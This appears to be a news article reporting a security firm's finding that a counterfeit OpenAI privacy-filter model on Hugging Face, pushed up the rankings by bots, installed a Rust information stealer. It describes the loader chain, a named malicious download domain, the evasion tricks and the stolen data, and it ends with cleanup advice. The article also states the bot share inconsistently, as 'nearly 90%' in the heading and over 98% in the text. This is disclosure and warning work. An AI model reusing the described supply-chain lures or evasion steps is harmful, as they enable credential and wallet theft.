Fake OpenAI open-source model wins Hugging Face championship! 240k downloads secretly contain malware

Cybersecurity firm HiddenLayer reveals that a malicious model impersonating OpenAI Privacy Filter surged to the top of Hugging Face’s trending list in just 18 hours, drawing more than 240,000 downloads, while hiding a six-stage Rust-based information stealer that specifically targets browser passwords, cryptocurrency wallet seed phrases, and SSH keys.
(Background: WSJ: Google secret talks with SpaceX to advance “Orbital AI Data Centers,” as Elon Musk’s fleet of millions of satellites prepares for an epic IPO)
(Additional background: AI security startup Depthfirst announces it has defeated Anthropic’s Mythos model! Unearthed an 18-year-old epic NGINX vulnerability, with detection costs of only 1/10)

Table of Contents

Toggle

• Surged to the top in 18 hours, with nearly 90% of likes coming from bot accounts
• Six-stage attack chain: from fake training screens to system-level privilege theft
• Targets Chrome/Firefox, Discord, cryptocurrency wallets
• Not a single incident: at least seven malicious repositories have been identified
• What should you do if you downloaded it?

OpenAI launched the open-source model Privacy Filter at the end of April—a lightweight model that can automatically detect and mask personally identifiable information (PII) in text, and was released on Hugging Face under the Apache 2.0 license, quickly attracting a great deal of attention from developers. However, this wave of popularity also attracted uninvited guests.

HiddenLayer, a cybersecurity firm, disclosed that a fake account named “Open-OSS” published an almost identical repository on Hugging Face. The repository name was also privacy-filter, and the model card copied the official OpenAI version verbatim. The only difference was hidden in the readme file—it directs users to run start.bat (Windows) or loader.py (Linux/Mac) after downloading.

Surged to the top in 18 hours, with nearly 90% of likes coming from bot accounts

In just 18 hours, this fake repository climbed to first place on Hugging Face’s trending leaderboard, accumulating about 244,000 downloads and 667 likes. HiddenLayer’s tracking found that 657 of those likes came from accounts that match automated bot naming patterns—in other words, more than 98% of the social signals were fabricated. Download numbers were also very likely inflated using the same method, creating a false impression of explosive popularity and luring genuine developers in.

Six-stage attack chain: from fake training screens to system-level privilege theft

The design of this malware is fairly ingenious. When loader.py runs, it first displays forged model training output—progress bars, synthetic datasets, and virtual class names—making it look like a legitimate AI loader is running. But in the background, it quietly shuts off security checks, pulls an encoded command from a public JSON posting site, and passes it to a hidden PowerShell.

That command downloads a second script from a domain impersonating a blockchain analytics API (api.eth-fastscan.org), and then this second script downloads the real malicious payload—a custom information stealer written in Rust. It automatically adds itself to the Windows Defender exclusion list, and then launches via a scheduled task with SYSTEM privileges. After the scheduled task runs, it immediately deletes itself, leaving almost no trace.

Targets Chrome/Firefox, Discord, cryptocurrency wallets

This information stealer can be described as “leaving nothing behind.” It extracts all stored data from Chrome and Firefox—passwords, login Session Cookies, browsing history, and encryption keys; targets Discord accounts, cryptocurrency wallet seed phrases, SSH keys, and FTP credentials; and also takes screenshots of all screens. Finally, it bundles all collected data into a compressed JSON package and sends it to a server controlled by the attacker.

Even more deviously, the malware also detects whether it is running inside a virtual machine or a secure sandbox environment; if it finds that it is, it quietly exits. Its design is a one-time attack on real targets—steal everything and disappear without a trace.

Not a single incident: at least seven malicious repositories have been identified

HiddenLayer points out that this is not an isolated incident. On the same command server, they found six additional repositories on a Hugging Face account named “anthfu,” each using completely identical malicious loaders, uploaded at the end of April. The fake models include Qwen3, DeepSeek, and Bonsai, and they also target AI developers.

The attackers do not hack OpenAI or Hugging Face directly; instead, they publish convincing counterfeit versions, use bots to artificially boost the trending rankings, and then wait for developers to download and run them. This script previously played out in the 2024 LottiePlayer JavaScript library supply chain attack, where a user lost 10 Bitcoins (worth more than $700,000 at the time).

The fake repository has been taken down on Hugging Face, but as of the time of publication, the platform has not announced any new review mechanism for trending repositories. At present, seven malicious repositories are known. How many more remain undiscovered or have already been deleted is still unknown.

What if you downloaded it?

Cybersecurity experts advise that if you copied Open-OSS/privacy-filter onto a Windows machine and executed any of its files, you should treat that device as fully compromised—do not log into any services from that computer before cleaning it. Next, change all credentials stored in your browser, generate new wallets on a clean device, and transfer your cryptocurrency assets immediately. Discord sessions must be forcibly invalidated and passwords reset, and SSH keys and FTP credentials should also be treated as leaked.